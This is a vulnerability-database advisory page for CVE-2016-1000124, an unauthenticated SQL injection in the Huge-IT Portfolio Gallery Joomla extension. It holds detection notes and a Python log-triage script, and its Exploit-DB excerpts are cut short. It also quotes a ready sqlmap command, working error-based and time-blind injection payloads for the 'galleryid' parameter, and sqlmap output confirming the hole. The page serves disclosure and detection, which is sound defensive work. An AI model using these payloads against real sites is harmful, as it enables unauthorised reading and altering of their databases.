CVE-2016-1000124
Published 2016-10-06
CVE-2016-1000124: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Priority P2 · 62 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.55% (83.1st percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huge-it | portfolio_gallery | — | — |
Detection & IOCs (extracted from sources)
- Command: `sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3`
- Payload (error-based): `page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2`
- Payload (time-blind): `page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2`
- Monitor POST requests to /components/com_portfoliogallery/ajax_url.php for SQL injection patterns in the 'galleryid' parameter, including OR/GROUP BY/CONCAT/FLOOR(RAND()) error-based payloads and SLEEP()-based time-blind payloads.
- The vulnerable POST parameter is 'galleryid'; alert on values containing SQL keywords such as OR, GROUP BY, CONCAT, SLEEP or CASE WHEN in the POST body sent to this endpoint.
- A high rate of HTTP 500 Internal Server Error responses from /components/com_portfoliogallery/ajax_url.php may indicate active SQL injection exploitation (sqlmap generated 2715 such errors during the PoC run).
- The exploit requires no authentication; any unauthenticated POST to ajax_url.php with the 'post' field set to 'huge_it_portfolio_gallery_ajax' should be treated as suspicious and inspected for injection payloads.
- The file ajax_url.php is directly web-accessible outside the normal Joomla MVC dispatch path, bypassing standard Joomla access controls; restricting direct HTTP access to this file at the web-server level is an effective mitigation.
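The detection notes above turned into a small triage routine, as an added example that is not part of this page's sources: it classifies request records by the 'post' marker and the 'galleryid' value and reports the HTTP 500 share on the endpoint. It assumes that a legitimate galleryid is a plain integer, and the request records (method, path, status, body) are constructed sample input.

```python
import re
from urllib.parse import parse_qs

# Endpoint and marker field named in the advisory and detection notes above.
ENDPOINT = "/components/com_portfoliogallery/ajax_url.php"
MARKER = "huge_it_portfolio_gallery_ajax"
# SQL tokens taken from the error-based and time-blind payloads quoted above.
SQL_TOKENS = re.compile(r"\b(OR|AND|SELECT|GROUP\s+BY|HAVING|CONCAT|FLOOR|RAND|SLEEP|CASE\s+WHEN)\b"
                        r"|#|--", re.IGNORECASE)

def classify(method, path, body):
    """None outside the vulnerable call path; else 'benign', 'suspicious' or 'sqli'."""
    if method != "POST" or not path.endswith(ENDPOINT):
        return None
    params = parse_qs(body, keep_blank_values=True)  # also URL-decodes the values
    if params.get("post", [""])[0] != MARKER:
        return None
    galleryid = params.get("galleryid", [""])[0]
    if galleryid.strip().isdigit():  # assumption: real gallery ids are plain integers
        return "benign"
    return "sqli" if SQL_TOKENS.search(galleryid) else "suspicious"

def triage(records):
    """Tally verdicts over (method, path, status, body) records plus the endpoint's HTTP 500 share."""
    counts = {"benign": 0, "suspicious": 0, "sqli": 0}
    hits = errors = 0
    for method, path, status, body in records:
        verdict = classify(method, path, body)
        if verdict is None:
            continue
        counts[verdict] += 1
        hits += 1
        errors += 1 if status == 500 else 0
    counts["error_rate"] = errors / hits if hits else 0.0
    return counts

# Constructed sample traffic: a normal gallery page load, the two payloads
# quoted on this page, an sqlmap-style '*' probe and one unrelated request.
TAIL = "&post=" + MARKER + "&perpage=20&linkbutton=2"
SAMPLE = [
    ("POST", ENDPOINT, 200, "page=1&galleryid=3" + TAIL),
    ("POST", ENDPOINT, 500, "page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,"
     "(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,"
     "FLOOR(RAND(0)*2)) HAVING MIN(0)#" + TAIL),
    ("POST", ENDPOINT, 200, "page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) "
     "ELSE 9445 END)" + TAIL),
    ("POST", ENDPOINT, 500, "page=1&galleryid=*" + TAIL),
    ("GET", "/index.php", 200, ""),
]
```

Running `triage(SAMPLE)` yields two 'sqli' verdicts, one 'suspicious' probe, one 'benign' request and an error rate of 0.5 on the endpoint.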
CVSS provenance
- NVD v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Exploit-DB
Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
exploitdb·2017-08-31·CVSS 9.8
---
# Exploit Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
# Date: 2016-09-16
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/
# Software Link:
# Version: 1.0.6
# Tested on: Linux
# CVE : CVE-2016-1000124
# Advisory: http://www.vapidlabs.com/advisory.php?v=170
# Exploit:
$ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s)
Exploit-DB
Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
exploitdb·2016-09-16·CVSS 9.8
---
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Joomla extension v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:
In file ajax_url.php:
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
No writeups or analysis indexed.
References
- http://huge-it.com/joomla-portfolio-gallery/
- http://www.securityfocus.com/bid/93268
- http://www.vapidlabs.com/advisory.php?v=170
- https://www.exploit-db.com/exploits/42597/
Published 2016-10-06